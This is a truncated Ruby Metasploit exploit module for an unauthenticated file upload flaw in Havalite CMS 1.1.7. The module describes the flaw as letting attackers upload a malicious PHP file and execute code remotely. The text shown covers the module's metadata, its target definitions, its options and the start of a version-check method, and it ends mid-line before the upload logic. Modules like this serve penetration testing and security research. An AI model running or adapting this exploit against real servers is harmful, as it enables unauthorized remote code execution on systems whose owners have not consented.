## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info={}) super(update_info(info, 'Name' => "Havalite CMS Arbitary File Upload Vulnerability", 'Description' => %q{ This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'CWH', 'sinn3r' #Metasploit ], 'References' => [ ['OSVDB', '94405'], ['EDB', '26243'] ], 'Payload' => { 'BadChars' => "\x00" }, 'Platform' => %w{ linux php }, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ] ], 'Privileged' => false, 'DisclosureDate' => "Jun 17 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to havalite', '/']) ]) end # # Checks if target is running HavaLite CMS 1.1.7 # We only flag 1.1.7 as vulnerable, because we don't have enough information from # the vendor or OSVDB about exactly which ones are really vulnerable. # def check uri = normalize_uri(target_uri.path, 'havalite/') res = send_request_raw({'uri' => uri}) if not res vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end js_src = res.body.scan(/